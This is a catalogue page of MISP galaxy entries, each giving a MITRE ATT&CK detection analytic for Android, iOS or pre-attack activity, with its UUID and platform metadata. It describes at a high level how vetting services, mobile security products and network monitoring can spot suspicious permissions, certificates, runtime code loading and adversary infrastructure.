In both Android (6.0 and up) and iOS, the user can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. Android applications requesting the ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION, or ACCESS_BACKGROUND_LOCATION permissions and iOS applications including the NSLocationWhenInUseUsageDescription, NSLocationAlwaysAndWhenInUseUsageDescription, and/or NSLocationAlwaysUsageDescription keys in their Info.plist file could be scrutinized during the application vetting process.

Internal MISP references

UUID 83b759ca-097c-4d9f-926b-fb41e0740644 which can be used as unique global reference for Analytic 1776 - AN1776 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1776
mitre_platforms ['Android']

Analytic 1767 - AN1767

Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.

Internal MISP references

UUID bfa12b75-13ab-409f-8fe9-a93c8bcac466 which can be used as unique global reference for Analytic 1767 - AN1767 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1767
mitre_platforms ['Android']

Analytic 1768 - AN1768

Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.

Internal MISP references

UUID 1e72355d-3350-4b60-8c92-2ded50a3fdd1 which can be used as unique global reference for Analytic 1768 - AN1768 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1768
mitre_platforms ['iOS']

Analytic 1687 - AN1687

Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. On both Android and iOS, the user must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. The user can see registered VPN services in the device settings.

Internal MISP references

UUID 384bbe3f-bb48-4bf3-927e-3a95d13eae82 which can be used as unique global reference for Analytic 1687 - AN1687 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1687
mitre_platforms ['Android']

Analytic 1786 - AN1786

The user can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. Certain dangerous permissions, such as RECEIVE_SMS, could receive additional scrutiny.

Internal MISP references

UUID 99227275-37f5-400f-95ae-b5e17abfb0fd which can be used as unique global reference for Analytic 1786 - AN1786 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1786
mitre_platforms ['Android']

Analytic 1678 - AN1678

Application vetting services may be able to list domains and/or IP addresses that applications communicate with. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of DexClassLoader, System.load, or the WebView JavaScriptInterface capability; on iOS, use of JSPatch or similar capabilities).

Internal MISP references

UUID b6d9d5a1-5966-4888-b4ce-30b125043c4d which can be used as unique global reference for Analytic 1678 - AN1678 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1678
mitre_platforms ['iOS']

Analytic 1976 - AN1976

Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Detection efforts may be focused on related behaviors, such as Web Protocols , Asymmetric Cryptography , and/or Install Root Certificate .

Internal MISP references

UUID 06c3cd77-148a-424e-a55e-1e11ff3d9504 which can be used as unique global reference for Analytic 1976 - AN1976 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1976
mitre_platforms ['PRE']

Analytic 1967 - AN1967

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).

Internal MISP references

UUID 8619af40-05db-49a7-b7b8-476facfd4b2c which can be used as unique global reference for Analytic 1967 - AN1967 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1967
mitre_platforms ['PRE']

Analytic 1679 - AN1679

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID 04fbc0f1-82f0-4311-9c39-6b519b48e7d8 which can be used as unique global reference for Analytic 1679 - AN1679 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1679
mitre_platforms ['Android']

Analytic 1769 - AN1769

The user may view applications with administrator access through the device settings and may also notice if user data is inexplicably missing. Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting file deletion processes.
The user is prompted for approval when an application requests device administrator permissions. Application vetting services may detect API calls for deleting files.
Mobile security products can detect which applications can request device administrator permissions. Application vetting services could be extra scrutinous of applications that request device administrator permissions.

Internal MISP references

UUID 44d378d8-575b-41c8-b75c-375abcf3e2db which can be used as unique global reference for Analytic 1769 - AN1769 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1769
mitre_platforms ['Android']

Analytic 1796 - AN1796

Application vetting services could look for android.permission.READ_SMS in an Android application’s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID b1674dca-753f-45d9-b0de-4c68e459f046 which can be used as unique global reference for Analytic 1796 - AN1796 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1796
mitre_platforms ['iOS']

Analytic 1697 - AN1697

Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.

Internal MISP references

UUID c1cdc6fb-9b7f-4076-9634-c939ddaef2bf which can be used as unique global reference for Analytic 1697 - AN1697 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1697
mitre_platforms ['Android']

Analytic 1688 - AN1688

Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. On both Android and iOS, the user must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. The user can see registered VPN services in the device settings.

Internal MISP references

UUID 36ca4ab8-1a16-4989-89e6-8d20c514c8c7 which can be used as unique global reference for Analytic 1688 - AN1688 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1688
mitre_platforms ['iOS']

Analytic 1986 - AN1986

Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 4dbe3d83-4e01-455f-94f2-a1a31b410b47 which can be used as unique global reference for Analytic 1986 - AN1986 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1986
mitre_platforms ['PRE']

Analytic 1968 - AN1968

If infrastructure or patterns in the malicious web content related to malvertising have been previously identified, internet scanning may uncover when an adversary has staged malicious web content. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as Drive-by Compromise or Exploitation for Client Execution.

Internal MISP references

UUID 81f695b5-7621-4a82-8036-536c6687b5b4 which can be used as unique global reference for Analytic 1968 - AN1968 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1968
mitre_platforms ['PRE']

Analytic 1689 - AN1689

Remote access software typically requires many privileged permissions, such as accessibility services or device administrator.

Internal MISP references

UUID 4d499685-2a71-4d66-8b44-fae780c3e998 which can be used as unique global reference for Analytic 1689 - AN1689 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1689
mitre_platforms ['Android']

Analytic 1698 - AN1698

Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.

Internal MISP references

UUID 9aa716a2-0301-49cd-89c0-a441e5da0551 which can be used as unique global reference for Analytic 1698 - AN1698 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1698
mitre_platforms ['iOS']

Analytic 1969 - AN1969

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Phishing, Endpoint Denial of Service, or Network Denial of Service.

Internal MISP references

UUID 1b067cad-c75b-484e-8aaa-4b058c8ec9f7 which can be used as unique global reference for Analytic 1969 - AN1969 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1969
mitre_platforms ['PRE']

Analytic 1996 - AN1996

Once adversaries leverage serverless functions as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle.

Internal MISP references

UUID fd652339-e12f-4295-b843-0665680054bd which can be used as unique global reference for Analytic 1996 - AN1996 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1996
mitre_platforms ['PRE']

Analytic 1699 - AN1699

Network traffic analysis may reveal processes communicating with malicious domains.

Internal MISP references

UUID 9a574586-2729-4e60-8e60-5e07f200c3ff which can be used as unique global reference for Analytic 1699 - AN1699 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1699
mitre_platforms ['Android']

Analytic 1777 - AN1777

In both Android (6.0 and up) and iOS, the user can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. Android applications requesting the ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION, or ACCESS_BACKGROUND_LOCATION permissions and iOS applications including the NSLocationWhenInUseUsageDescription, NSLocationAlwaysAndWhenInUseUsageDescription, and/or NSLocationAlwaysUsageDescription keys in their Info.plist file could be scrutinized during the application vetting process.

Internal MISP references

UUID f34fef81-f714-4e26-ae99-3c970959cd0d which can be used as unique global reference for Analytic 1777 - AN1777 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1777
mitre_platforms ['iOS']

Analytic 1778 - AN1778

An Android user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). Application vetting services can look for applications requesting the android.permission.SYSTEM_ALERT_WINDOW permission in the list of permissions in the app manifest.

Internal MISP references

UUID 2867d1e0-cf83-4d83-bc6c-cc03404c3521 which can be used as unique global reference for Analytic 1778 - AN1778 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1778
mitre_platforms ['Android']

Analytic 1787 - AN1787

The user can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. Certain dangerous permissions, such as RECEIVE_SMS, could receive additional scrutiny.

Internal MISP references

UUID 72604d06-ac1b-4d57-adb4-f303f2f82055 which can be used as unique global reference for Analytic 1787 - AN1787 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1787
mitre_platforms ['iOS']

Analytic 1977 - AN1977

Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle. Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)

Internal MISP references

UUID de93de79-3f24-4022-9b03-7228ffacca6f which can be used as unique global reference for Analytic 1977 - AN1977 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1977
mitre_platforms ['PRE']

Analytic 1779 - AN1779

An Android user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). Application vetting services can look for applications requesting the android.permission.SYSTEM_ALERT_WINDOW permission in the list of permissions in the app manifest.

Internal MISP references

UUID 8062d295-9d02-40c5-9ef9-135d08c07a22 which can be used as unique global reference for Analytic 1779 - AN1779 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1779
mitre_platforms ['iOS']

Analytic 1797 - AN1797

Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense) Mobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running.

Internal MISP references

UUID e13d662d-a496-4997-b26a-39e71eb17fc2 which can be used as unique global reference for Analytic 1797 - AN1797 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1797
mitre_platforms ['Android']

Analytic 1788 - AN1788

On Android, the user is presented with a permissions popup when an application requests access to external device storage.

Internal MISP references

UUID 36cb5f92-996c-42f4-be7e-43c5e21eee2e which can be used as unique global reference for Analytic 1788 - AN1788 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1788
mitre_platforms ['Android']

Analytic 1987 - AN1987

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 058452ee-f484-4e2f-b2ad-d562e34847fb which can be used as unique global reference for Analytic 1987 - AN1987 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1987
mitre_platforms ['PRE']

Analytic 1978 - AN1978

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: Transfer Data to Cloud Account).

Internal MISP references

UUID 97ec7ade-18b7-43b7-b267-85470862b6ac which can be used as unique global reference for Analytic 1978 - AN1978 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1978
mitre_platforms ['PRE']

Analytic 1789 - AN1789

On Android, the user is presented with a permissions popup when an application requests access to external device storage.

Internal MISP references

UUID 0048442c-54c9-4816-a2ba-5e9d376d0bf2 which can be used as unique global reference for Analytic 1789 - AN1789 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1789
mitre_platforms ['iOS']

Analytic 1798 - AN1798

If the user sees a notification with text they do not recognize, they should review their list of installed applications.

Internal MISP references

UUID f1e295df-0598-4263-b7c4-737d66660bbe which can be used as unique global reference for Analytic 1798 - AN1798 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1798
mitre_platforms ['Android']

Analytic 1979 - AN1979

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 4ba44323-b5b0-46c9-be94-f2c5d0fdbec5 which can be used as unique global reference for Analytic 1979 - AN1979 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1979
mitre_platforms ['PRE']

Analytic 1997 - AN1997

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Internal MISP references

UUID 705ecef8-b41e-4b1f-bd7c-f3b2ff930c11 which can be used as unique global reference for Analytic 1997 - AN1997 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1997
mitre_platforms ['PRE']

Analytic 1799 - AN1799

If the user sees a notification with text they do not recognize, they should review their list of installed applications.

Internal MISP references

UUID 3d12c26c-740d-4393-9659-52a424586b20 which can be used as unique global reference for Analytic 1799 - AN1799 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1799
mitre_platforms ['iOS']

Analytic 1988 - AN1988

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID c752faa1-9cc2-421a-b646-0efe4da990c9 which can be used as unique global reference for Analytic 1988 - AN1988 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1988
mitre_platforms ['PRE']

Analytic 1989 - AN1989

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 8a75f571-49f8-4df8-b02c-fad2189273ee which can be used as unique global reference for Analytic 1989 - AN1989 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1989
mitre_platforms ['PRE']

Analytic 1998 - AN1998

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Internal MISP references

UUID ac4bf64e-da14-4416-8961-f0736eb4d9be which can be used as unique global reference for Analytic 1998 - AN1998 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1998
mitre_platforms ['PRE']

Analytic 1999 - AN1999

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Internal MISP references

UUID f2f01ea3-a59c-42b1-b934-83065ae1f785 which can be used as unique global reference for Analytic 1999 - AN1999 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1999
mitre_platforms ['PRE']